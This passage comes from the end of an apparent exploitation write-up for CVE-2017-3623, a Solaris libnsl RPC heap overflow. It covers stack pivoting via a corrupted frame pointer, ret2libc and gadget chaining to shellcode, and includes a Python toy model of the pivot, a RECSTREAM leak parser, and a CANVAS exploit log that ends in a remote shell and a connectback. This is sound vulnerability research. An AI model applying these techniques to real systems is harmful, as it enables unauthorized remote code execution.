  6. The exploit now uses its knowledge of the stack frames to corrupt a saved frame pointer using the write4. This redirects the control flow to a ret2libc payload with full control of EBP. The first “gadget” executed is a function epilogue in order to control the stack pointer:
    80760ae: 8b e5 mov %ebp,%esp ; stack is controlled
    80760b0: 5d pop %ebp ; therefore the next
    80760b1: c3 ret ; pop are controlled.

Note: The corruption of the stack is a nice way to achieve true stack control. When we ran the ebbisland exploit we observed that it was trying to one-shot the process by controlling xdr_inline(). There is no doubt that the PC is controlled and on Solaris 9 and earlier, this method works. However on Solaris 10 you need ROP and thus control of the stack, which you don’t have by default with a heap overflow. The problem is that finding the “gadget” to do so is hard because the main binary is small, as said earlier (thus gadget poor). Additionally the other libraries are loaded at, a priori, unknown locations and their .text section cannot be leaked (due to the write condition mentioned before).

  7. Since the stack pointer is controlled, gadgets can be chained and:
       1. A call to memcpy() (or equivalent) is performed to copy the shellcode stored within the network packet into the data section of the dynamic loader (this section is +rwx).
       2. The gadget returns into the shellcode and a connect back is executed.
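To make the last two steps more concrete, here is a toy model of the epilogue gadget (mov %ebp,%esp ; pop %ebp ; ret) acting on a corrupted saved frame pointer. It is a sketch under assumptions, not the exploit itself: every address is a placeholder (a few are borrowed from the sample output purely for flavour, and their exact role in the real exploit is an assumption), and the fake frame follows the classic cdecl ret2libc layout for memcpy(dst, src, n).

```python
class Machine:
    """Tiny model of ESP/EBP/EIP and a sparse memory of 32-bit words."""

    def __init__(self):
        self.mem = {}  # address -> 32-bit word
        self.esp = self.ebp = self.eip = 0

    def write_words(self, addr, words):
        for i, word in enumerate(words):
            self.mem[addr + 4 * i] = word & 0xFFFFFFFF

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def epilogue(self):
        # mov %ebp,%esp ; pop %ebp ; ret
        self.esp = self.ebp
        self.ebp = self.pop()
        self.eip = self.pop()


# Placeholder addresses (assumptions made for the sake of the example).
SAVED_EBP_SLOT = 0x08047D04  # stack slot holding the saved frame pointer
FAKE_FRAME = 0x080AA828      # attacker data stored on the heap
LD_DATA = 0xFEFFB000         # writable and executable destination
MEMCPY = 0xFEF01234          # hypothetical address of memcpy()
SHELLCODE_SRC = 0x080AA900   # hypothetical location of the shellcode
SHELLCODE_LEN = 0x100        # hypothetical shellcode length
LEGIT_RET = 0x08051234       # hypothetical untouched return address


def run_pivot():
    m = Machine()
    # Victim frame: the saved EBP has already been overwritten by the
    # write4, the return address next to it is left untouched.
    m.write_words(SAVED_EBP_SLOT, [FAKE_FRAME, LEGIT_RET])
    # Fake frame: dummy EBP, then memcpy(LD_DATA, SHELLCODE_SRC, LEN)
    # whose own return address is LD_DATA (the copied shellcode).
    m.write_words(FAKE_FRAME, [0x41414141, MEMCPY, LD_DATA,
                               LD_DATA, SHELLCODE_SRC, SHELLCODE_LEN])
    m.ebp = SAVED_EBP_SLOT
    m.epilogue()          # callee returns normally, but EBP is now ours
    first_eip = m.eip
    m.epilogue()          # caller's epilogue moves EBP into ESP: pivot
    return m, first_eip


if __name__ == "__main__":
    machine, first = run_pivot()
    print("first return  : 0x%08x" % first)
    print("after pivot   : eip=0x%08x esp=0x%08x" % (machine.eip, machine.esp))
```

The point of the model is that the first return is still legitimate; only the second epilogue loads ESP from the corrupted EBP, after which every pop and ret reads attacker data.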



This is an example of output from the CANVAS exploit:
2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - Discovered interfaces:
2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - - ['lo', '127.0.0.1', '255.0.0.0']
2017-06-26 17:50:36,532 [ exploitutils.py] - INFO - - ['enp0s3-ipv6', 'fe80::61:853c:fa1b:3af6:76', 'ffff:ffff:ffff:ffff::']
[...]
2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - OS detected: Solaris ['10', '11']
2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - >>> Method #1: Attempting to exploit bootparam
2017-06-26 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Checking if bootparam is available
2017-06-26 17:50:36,663 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK
2017-06-26 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Expecting an u10 version
2017-06-26 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing x86 target
2017-06-26 17:50:37,430 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00 sec
2017-06-26 17:50:40,540 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing amd64 target
2017-06-26 17:50:41,259 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00 sec
2017-06-26 17:50:44,370 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Starting the generic attack
2017-06-26 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the "leaky"'s RECSTREAM object
2017-06-26 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying the ultra-fast range
2017-06-26 17:50:46,362 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] RECSTREAM object is at: 0x080ae080
2017-06-26 17:50:48,352 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.tcp_handle = 0x080ad8b0
2017-06-26 17:50:48,354 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.writeit = 0xfef3bdf4
2017-06-26 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_base = 0x080ae000
2017-06-26 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_finger = 0x080ae104
2017-06-26 17:50:48,356 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.out_boundry = 0x080b0408
2017-06-26 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.frag_header = 0x080ae0e0
2017-06-26 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.frag_sent = 0
2017-06-26 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.readit = 0x00000000
2017-06-26 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_base = 0x080b0410
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_finger = 0x080b13b0
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_boundry = 0x080b13b0
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.fbtbc = 0
2017-06-26 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.last_frag = 1
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.sendsize = 9000 [0x00002328]
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.recvsize = 4000 [0x00000fa0]
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.firsttime = 0
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nonblock = 0
2017-06-26 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_needpoll = 1
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_maxrecsz = 0
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nextrec = 0x080b0410
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - recstream.in_nextrecsz = 0
2017-06-26 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the associated 'XDR' object and the place to store a fake RECSTREAM
2017-06-26 17:50:50,361 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found the XDR object at 0x080adec4:
2017-06-26 17:50:50,362 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_op = 0
2017-06-26 17:50:50,363 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_ops = 0xfef88998
2017-06-26 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_public = 0x00000000
2017-06-26 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_private = 0x080ae080 [RECSTREAM object]
2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_base = 0x00000000
2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_handy = 0
2017-06-26 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found the perfect place to store our fake RECSTREAM: 0x080ada00
2017-06-26 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] libnsl is loaded at 0xfef80000
2017-06-26 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the ret2ld payload
2017-06-26 17:50:57,920 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Found the payload!
2017-06-26 17:50:57,922 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found ret2addr payload at 0x080aa828
2017-06-26 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the STACK
2017-06-26 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08046000, 0x080467ff]
2017-06-26 17:50:59,811 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08046000
2017-06-26 17:51:00,314 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08046800, 0x08046fff]
2017-06-26 17:51:02,198 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08046800
2017-06-26 17:51:02,700 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047000, 0x080477ff]
2017-06-26 17:51:04,590 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08047000
2017-06-26 17:51:05,092 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047800, 0x08047bff]
2017-06-26 17:51:06,989 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 1024 bytes at 08047800
2017-06-26 17:51:07,491 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047c00, 0x08047dff]
2017-06-26 17:51:09,387 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 512 bytes at 08047c00
2017-06-26 17:51:09,889 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047e00, 0x08047e7f]
2017-06-26 17:51:11,778 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 128 bytes at 08047e00
2017-06-26 17:51:12,280 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047e80, 0x08047eff]
2017-06-26 17:51:14,167 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 128 bytes at 08047e80
2017-06-26 17:51:14,670 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f00, 0x08047f1f]
2017-06-26 17:51:16,556 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f00
2017-06-26 17:51:17,059 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f20, 0x08047f3f]
2017-06-26 17:51:18,946 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f20
2017-06-26 17:51:19,449 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f40, 0x08047f5f]
2017-06-26 17:51:21,337 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f40
2017-06-26 17:51:21,839 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f60, 0x08047f7f]
2017-06-26 17:51:23,727 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f60
2017-06-26 17:51:24,229 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Analyzing the stack [0x08046000, 0x08047f7f]
2017-06-26 17:51:24,252 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found LD_DATA at 0xfeffb000
2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found our target FP copy at 0x08047d04
2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - The infoleak is a success, let's try to get the shell now!
2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - Trying first with saved_ebp = 08047d04
2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Got a shell!
2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl (RPC) - Remote Heap Overflow attacking 192.168.1.147:33583 (succeeded!)
2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl (RPC) - Remote Heap Overflow done (Success!)
2017-06-26 17:51:26,188 [ exploitutils.py] - INFO - done -- connectback set to 192.168.1.186:5555
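
The recstream.* lines in this output suggest how a leaked blob can be turned back into named fields. The following sketch assumes that every field is a 32-bit little-endian word laid out in the order printed above; the field names come from the log, but the widths and the absence of padding are assumptions and the real structure may differ. The sanity check is likewise only a heuristic of ours.

```python
import struct

# Field names in the order they appear in the exploit output.
RECSTREAM_FIELDS = (
    "tcp_handle", "writeit", "out_base", "out_finger", "out_boundry",
    "frag_header", "frag_sent", "readit", "in_base", "in_finger",
    "in_boundry", "fbtbc", "last_frag", "sendsize", "recvsize",
    "firsttime", "in_nonblock", "in_needpoll", "in_maxrecsz",
    "in_nextrec", "in_nextrecsz",
)
# Assumption: one 32-bit little-endian word per field, no padding.
RECSTREAM_FORMAT = "<%dI" % len(RECSTREAM_FIELDS)
RECSTREAM_SIZE = struct.calcsize(RECSTREAM_FORMAT)


def parse_recstream(blob):
    """Decode a leaked blob into a dict of field name -> integer."""
    if len(blob) < RECSTREAM_SIZE:
        raise ValueError("need %d bytes, got %d" % (RECSTREAM_SIZE, len(blob)))
    values = struct.unpack_from(RECSTREAM_FORMAT, blob)
    return dict(zip(RECSTREAM_FIELDS, values))


def looks_plausible(rs):
    """Heuristic: cursors must sit inside their respective buffers."""
    return (rs["out_base"] <= rs["out_finger"] <= rs["out_boundry"]
            and rs["in_base"] <= rs["in_finger"] <= rs["in_boundry"])


# Values copied from the sample output above, packed back into bytes.
SAMPLE = struct.pack(
    RECSTREAM_FORMAT,
    0x080AD8B0, 0xFEF3BDF4, 0x080AE000, 0x080AE104, 0x080B0408,
    0x080AE0E0, 0, 0x00000000, 0x080B0410, 0x080B13B0,
    0x080B13B0, 0, 1, 9000, 4000,
    0, 0, 1, 0,
    0x080B0410, 0,
)

if __name__ == "__main__":
    rs = parse_recstream(SAMPLE)
    for name in RECSTREAM_FIELDS:
        print("recstream.%s = 0x%08x" % (name, rs[name]))
    print("plausible:", looks_plausible(rs))
```

A check of this kind is useful when scanning empirical address ranges, since most candidate addresses will not decode into a consistent set of buffer pointers.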


6. Conclusion



CVE-2017-3623 is a very interesting bug with huge potential. While Solaris 10 itself is poorly protected (not to mention older versions), practical conditions require creativity in order to achieve reliable exploitation. Nothing new there, of course, as this has been done for decades [P61JP], even before ASLR. It is nonetheless a good example of why you may sometimes want to do more than hardcode offsets. And of course there would be much more to say, as bootparams is just one possible process to exploit. Remember that the bug is in libnsl.so!

7. References


[CORE] “Solaris Internals, Core Kernel Components”, Jim Mauro and Richard McDougall
[F1] “Linux/doc/old/etc/user.tool.ebbisland.COMMON” from the EQGRP repository
[F2] “Linux/etc/opscript.txt” from the EQGRP repository
[OPENSOL] git://repo.or.cz/opensolaris.git




Author: El Señor Ricardo